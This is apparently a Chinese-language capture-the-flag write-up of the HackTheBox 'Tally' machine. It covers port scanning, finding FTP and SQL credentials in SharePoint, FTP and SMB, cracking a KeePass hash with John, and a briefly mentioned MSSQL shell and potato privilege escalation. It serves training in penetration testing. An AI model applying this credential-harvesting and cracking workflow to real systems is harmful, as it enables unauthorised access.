Tally - HackTheBox

基本信息

• https://www.hackthebox.eu/home/machines/profile/113

• 10.10.10.59

端口扫描

常规windows端口：

$ nmap -sC -sV 10.10.10.59

Starting Nmap 7.92 ( https://nmap.org ) at 2021-08-25 14:09 CST
Nmap scan report for 10.10.10.59
Host is up (0.065s latency).
Not shown: 992 closed tcp ports (conn-refused)
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-ntlm-info:
|   Target_Name: TALLY
|   NetBIOS_Domain_Name: TALLY
|   NetBIOS_Computer_Name: TALLY
|   DNS_Domain_Name: TALLY
|   DNS_Computer_Name: TALLY
|_  Product_Version: 10.0.14393
| http-title: Home
|_Requested resource was http://10.10.10.59/_layouts/15/start.aspx#/default.aspx
|_http-server-header: Microsoft-IIS/10.0
|_http-generator: Microsoft SharePoint
81/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Bad Request
|_http-server-header: Microsoft-HTTPAPI/2.0
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
808/tcp  open  ccproxy-http?
1433/tcp open  ms-sql-s      Microsoft SQL Server 2016 13.00.1601.00; RTM
| ms-sql-ntlm-info:
|   Target_Name: TALLY
|   NetBIOS_Domain_Name: TALLY
|   NetBIOS_Computer_Name: TALLY
|   DNS_Domain_Name: TALLY
|   DNS_Computer_Name: TALLY
|_  Product_Version: 10.0.14393
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-08-25T06:07:42
|_Not valid after:  2051-08-25T06:07:42
|_ssl-date: 2021-08-25T06:10:08+00:00; 0s from scanner time.
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-08-25T06:09:55
|_  start_date: 2021-08-25T06:07:24
| ms-sql-info:
|   10.10.10.59:1433:
|     Version:
|       name: Microsoft SQL Server 2016 RTM
|       number: 13.00.1601.00
|       Product: Microsoft SQL Server 2016
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.55 seconds

80

Sharepoint:

sharepoint

常规目录查看文件，发现一个文档，其中是FTP密码：

• http://10.10.10.59/_layouts/15/viewlsts.aspx

另外切换到mobile模式，查看站点内容，可以发现一个财务团队页面，其中得到ftp用户名：

ftp-details

FTP details
hostname: tally
workgroup: htb.local
password: UTDRSCH53c"$6hys
Please create your own user folder upon logging in

FTP

登录FTP，可以得到一个keepass数据库文件：

/User/Tim/Files/tim.kdbx，并且另一个文本也提示里面有密码

keepass

破解出来kepass 主密码：

keepass2john tim.kdbx
tim:$keepass$*2*6000*0*f362b5565b916422607711b54e8d0bd20838f5111d33a5eed137f9d66a375efb*3f51c5ac43ad11e0096d59bb82a59dd09cfd8d2791cadbdb85ed3020d14c8fea*3f759d7011f43b30679a5ac650991caa*b45da6b5b0115c5a7fb688f8179a19a749338510dfe90aa5c2cb7ed37f992192*535a85ef5c9da14611ab1c1edc4f00a045840152975a4d277b3b5c4edc1cd7da

sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
simplementeyo    (tim)

其中可以得到财务的共享密码：

Finance:Acc0unting

do to.txt

/User/Tim/Project/Log/do to.txt

To do:

Remove migration folder
Set secure share permissions

encrypted share creds:

password in keepass%

SMB

得到的财务账号密码可以访问SMB：

/zz_Migration/Binaries/New folder/tester.exe中得到数据库连接信息：

DRIVER={SQL Server};SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;PWD=GWE3V65#6KFH93@4GWTG2G;

MSSQL & user flag

mssql sa，常规getshell，得到Sarah用户shell,桌面得到user.txt:

提权信息

查看权限可以看到SeImpersonatePrivilege：

提权 & root flag

直接potato提权，Administrator桌面得到root.txt:

参考资料

• https://www.hackthebox.eu/home/machines/writeup/113
• Tally write-up - The Portal of Knowledge
  https://alamot.github.io/tally_writeup/
• HackTheBox - Tally - YouTube
  https://www.youtube.com/watch?v=l-wzBhc9wFc&ab_channel=IppSec